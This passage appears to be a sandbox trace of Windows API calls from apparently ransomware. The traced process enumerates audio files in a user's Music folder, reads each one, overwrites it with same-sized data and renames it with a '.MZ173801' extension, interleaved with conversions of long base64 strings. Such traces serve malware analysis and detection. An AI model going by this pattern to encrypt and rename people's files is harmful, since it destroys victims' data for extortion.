JFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.923] GetCurrentThreadId () returned 0x1358 [0116.923] GetCurrentThreadId () returned 0x1358 [0116.923] GetCurrentThreadId () returned 0x1358 [0116.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.924] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.924] GetCurrentThreadId () returned 0x1358 [0116.924] GetCurrentThreadId () returned 0x1358 [0116.924] GetCurrentThreadId () returned 0x1358 [0116.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\CovaDgRA8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\covadgra8.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x147ed [0116.924] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.925] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x147ed, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x147ed, lpOverlapped=0x0) returned 1 [0116.926] CloseHandle (hObject=0x3d0) returned 1 [0116.927] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\CovaDgRA8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\covadgra8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.928] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x147ed, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x147ed, lpOverlapped=0x0) returned 1 [0116.931] CloseHandle (hObject=0x3d0) returned 1 [0116.933] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\CovaDgRA8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\covadgra8.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\CovaDgRA8.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\covadgra8.m4a.mz173801")) returned 1 [0116.934] GetCurrentThreadId () returned 0x1358 [0116.934] GetCurrentThreadId () returned 0x1358 [0116.934] GetCurrentThreadId () returned 0x1358 [0116.934] GetCurrentThreadId () returned 0x1358 [0116.934] GetCurrentThreadId () returned 0x1358 [0116.934] GetCurrentThreadId () returned 0x1358 [0116.934] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a114c0, ftCreationTime.dwHighDateTime=0x1d5e855, ftLastAccessTime.dwLowDateTime=0x211c040, ftLastAccessTime.dwHighDateTime=0x1d5f0f1, ftLastWriteTime.dwLowDateTime=0x211c040, ftLastWriteTime.dwHighDateTime=0x1d5f0f1, nFileSizeHigh=0x0, nFileSizeLow=0x5593, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="dBFbFeABajg.m4a", cAlternateFileName="DBFBFE~1.M4A")) returned 1 [0116.934] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.934] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.934] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\dBFbFeABajg.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\dbfbfeabajg.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a114c0, ftCreationTime.dwHighDateTime=0x1d5e855, ftLastAccessTime.dwLowDateTime=0x211c040, ftLastAccessTime.dwHighDateTime=0x1d5f0f1, ftLastWriteTime.dwLowDateTime=0x211c040, ftLastWriteTime.dwHighDateTime=0x1d5f0f1, nFileSizeHigh=0x0, nFileSizeLow=0x5593)) returned 1 [0116.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.935] GetCurrentThreadId () returned 0x1358 [0116.935] GetCurrentThreadId () returned 0x1358 [0116.935] GetCurrentThreadId () returned 0x1358 [0116.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.935] GetCurrentThreadId () returned 0x1358 [0116.935] GetCurrentThreadId () returned 0x1358 [0116.935] GetCurrentThreadId () returned 0x1358 [0116.935] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\dBFbFeABajg.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\dbfbfeabajg.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x5593 [0116.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.936] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x5593, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x5593, lpOverlapped=0x0) returned 1 [0116.937] CloseHandle (hObject=0x3d0) returned 1 [0116.937] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\dBFbFeABajg.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\dbfbfeabajg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.938] WriteFile (in: hFile=0x3d0, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x5593, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f6f0*=0x5593, lpOverlapped=0x0) returned 1 [0117.038] CloseHandle (hObject=0x3d0) returned 1 [0117.044] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\dBFbFeABajg.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\dbfbfeabajg.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\dBFbFeABajg.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\dbfbfeabajg.m4a.mz173801")) returned 1 [0117.045] GetCurrentThreadId () returned 0x1358 [0117.045] GetCurrentThreadId () returned 0x1358 [0117.045] GetCurrentThreadId () returned 0x1358 [0117.045] GetCurrentThreadId () returned 0x1358 [0117.045] GetCurrentThreadId () returned 0x1358 [0117.045] GetCurrentThreadId () returned 0x1358 [0117.045] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb563d0, ftCreationTime.dwHighDateTime=0x1d5f0a6, ftLastAccessTime.dwLowDateTime=0x3ed3930, ftLastAccessTime.dwHighDateTime=0x1d5ec1e, ftLastWriteTime.dwLowDateTime=0x3ed3930, ftLastWriteTime.dwHighDateTime=0x1d5ec1e, nFileSizeHigh=0x0, nFileSizeLow=0x5bb0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="Q005Y62fvMbMZrM r-4F.wav", cAlternateFileName="Q005Y6~1.WAV")) returned 1 [0117.045] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0117.045] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0117.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\Q005Y62fvMbMZrM r-4F.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\q005y62fvmbmzrm r-4f.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb563d0, ftCreationTime.dwHighDateTime=0x1d5f0a6, ftLastAccessTime.dwLowDateTime=0x3ed3930, ftLastAccessTime.dwHighDateTime=0x1d5ec1e, ftLastWriteTime.dwLowDateTime=0x3ed3930, ftLastWriteTime.dwHighDateTime=0x1d5ec1e, nFileSizeHigh=0x0, nFileSizeLow=0x5bb0)) returned 1 [0117.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 